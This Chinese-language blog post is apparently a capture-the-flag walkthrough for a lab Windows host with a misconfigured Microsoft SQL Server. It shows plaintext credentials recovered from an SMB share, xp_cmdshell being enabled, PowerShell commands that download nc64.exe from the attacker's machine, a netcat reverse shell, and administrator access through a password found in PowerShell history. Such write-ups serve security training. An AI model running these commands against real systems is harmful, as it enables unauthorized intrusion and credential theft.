Microsoft SQL Server中的错误配置

这篇具有很好参考价值的文章主要介绍了Microsoft SQL Server中的错误配置。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

介绍

这篇文章将介绍如何利用Microsoft SQL Server中的错误配置,尝试获取反向shell并熟悉Impacket工具的使用,以便进一步攻击某些服务。

impacket的安装地址:https://github.com/SecureAuthCorp/impacket

Impacket是用于处理网络协议的Python类的集合。Impacket的重点是提供对数据包和某些协议(例如SMB1-3和MSRPC)的低级别编程访问,以及协议实现本身。包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层层次变得简单。

列举

执行网络扫描以检测哪些端口处于打开状态,这已经成为渗透测试过程的重要组成部分。因为这个能让我们更好地了解攻击面和目标的情况,让我们能够更好的进行针对性的攻击。

nmap -sC -sV 10.129.95.187

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

我们发现 SMB 端口已打开,并且 Microsoft SQL Server 2017 正在端口 1433 上运行。我们将使用工具smbclient 枚举 SMB:

smbclient -N -L \\\\10.129.95.187\\
-N:无密码
-L:此选项允许我们查看服务器上可用的服务

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

我们尝试进行访问

smbclient -N \\\\10.129.95.187\\backups

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

有一个名为prod.dtsConfig的文件,看起来像一个配置文件。我们可以使用get命令将其下载到我们的本地计算机进行进一步的脱机检查。

该文件将保存在我们启动的 SMB 会话目录中。以下是文件的内容:

cat prod.dtsConfig 

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

通过查看此配置文件的内容,我们在明文中发现了主机原型的用户sql_svc的密码,即M3g4c0rp123。使用提供的凭据,我们只需要一种方法来连接和验证 MSSQL 服务器。Impacket工具包括一个有价值的python脚本,称为mssqlclient.py它提供了这样的功能。

cd impacket/examples/
python3 mssqlclient.py -h

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

了解提供的选项后,我们可以尝试通过执行以下命令连接到 MSSQL 服务器:

-windows-auth:此标志被指定为使用Windows身份验证

python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.95.187 -windows-auth
M3g4c0rp123

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

ARCHETYPE/sql_svc一定是反斜杠,如果按照用户名的斜杆会出问题,报登录失败,多试几次反斜杠,会有正确的时候。

我们已成功通过微软 SQL Server 的身份验证

立足

连接成功后,我们进一步检查 SQL shell 的帮助选项:

help

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

帮助选项描述了它提供的基本功能,这意味着我们需要对此进行进一步的研究,以了解每个功能的内部工作原理。

这里有两篇很棒的文章,可以指导我们进一步探索MSSQL Server:

https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server

https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

作为第一步,我们需要检查我们在服务器中的角色是什么。我们将使用下述备忘单中的命令:

select is_srvrolemember('sysadmin');

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

输出为1,转换为True。

在之前的备忘单中,我们还发现了如何通过xp_cmdshell设置命令执行:

exec xp_cmdshell 'net user';— privOn MSSQL2005我们可能需要先重新激活xp_cmdshell,因为它默认处于禁用状态:

exec sp_configure 'show advanced options', 1;— 私人重新配置;— 私人

exec sp_configure'xp_cmdshell', 1;— 私人重新配置;— 私人

首先,建议通过发出第一个命令xp_cmdshell来检查是否已激活:

exec xp_cmdshell 'net user';

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

确实没有被激活。因此,我们需要按如下方式继续激活:

EXEC sp_configure 'show advanced options', 1;
reconfigure;
sp_configure;

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

最后,我们执行了以下命令

xp_cmdshell "whoami"

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

现在,我们将尝试获得一个稳定的反向外壳。我们将上传NC64.exe二进制到目标CMD.exe机器并执行

我们可以从kali上面下载二进制文件,在我们的侦听端口上处理。

我们导航到存放着nc.exe的文件夹,然后使用以下命令启动简单的 HTTP 服务器,然后在不同的选项卡中启动 netcat 侦听器:

python3 -m http.server 80

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

nc -lvnp 443

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

为了在目标系统中上传二进制文件,我们需要为此找到合适的文件夹。我们将PowerShell用于以下任务,因为它为我们提供了比常规命令更多的功能Powershell -c 命令。为了使用它,我们每次要执行它时都必须指定它,直到我们得到反向 shell。为此,我们将使用以下语法:

-c,该标志指示powershell执行命令。

我们将通过发布以下内容来打印当前工作目录:

xp_cmdshell "powershell -c pwd"

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

ifconfig

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

我们找到了放置二进制文件的文件夹。为此,我们将在powershell当中使用wget (wget实际上只是Invoke-WebRequest 的别名):

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.34/nc64.exe -outfile nc64.exe"

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

我们可以在简单的 Python HTTP 服务器上验证目标机器是否确实执行了请求:

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

现在,我们可以绑定cmd.exe通过nc去监听

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.16.34 443"

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

最后回顾一下我们的 netcat 侦听器,我们可以确认我们的反向 shell 和我们对系统的立足点:

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

user.txt可以在用户的桌面中找到:

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

type user.txt

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

3e7b102e78218e935bf3f4951fec21a3

权限提升

对于权限提升,我们将使用一个名为winPEAS的工具,它可以自动执行目标系统中大部分枚举过程。

https://www.freebuf.com/articles/web/281863.html,winpeas是windows提权工具,可以扫描windows服务器的漏洞。

我们将再次使用 Python HTTP 服务器将winpeas传输到我们的目标系统:

powershell
wget http://10.10.16.34/winPEASx64.exe -outfile winPEASx64.exe

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

我们成功下载了二进制文件。要执行它,我们将执行以下操作:

.\winPEASx64.exe

注意:该工具的输出很长,在这里我们只会看到输出的一小部分。

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

从输出中我们可以观察到我们拥有的SeImpersonatePrivilege(可以找到更多信息),这也容易受到Juicy Potato的影响。但是,我们可以首先检查可以找到凭据的两个现有文件。

由于这是一个普通用户帐户和服务帐户,因此值得检查频繁访问的文件或执行的命令。为此,我们将读取PowerShell历史记录文件,这相当于linux系统的.bash_history。该ConsoleHost_history.txt文件可以位于目录中C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\。

我们可以导航到存储PowerShell历史记录的文件夹:

cd AppData
cd Roaming\Microsoft\Windows\PowerShell\PSReadline\
dir

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

去阅读ConsoleHost_history.txt文件

type ConsoleHost_history.txt

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

user:administrator MEGACORP_4dm1n!!

我们以明文形式获得了管理员用户的密码,我们现在可以从Impacket套件中再次使用psexec.py工具以管理员身份获取shell:

psexec.py administrator@10.129.95.187
MEGACORP_4dm1n!!

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

现在可以在管理员用户的桌面上找到根标志:

sqlserver服务器名称有反斜杠,靶场,microsoft,服务器,运维

b91ccec3305e98240082d4474b848528文章来源地址https://www.toymoban.com/news/detail-577022.html

到了这里,关于Microsoft SQL Server中的错误配置的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包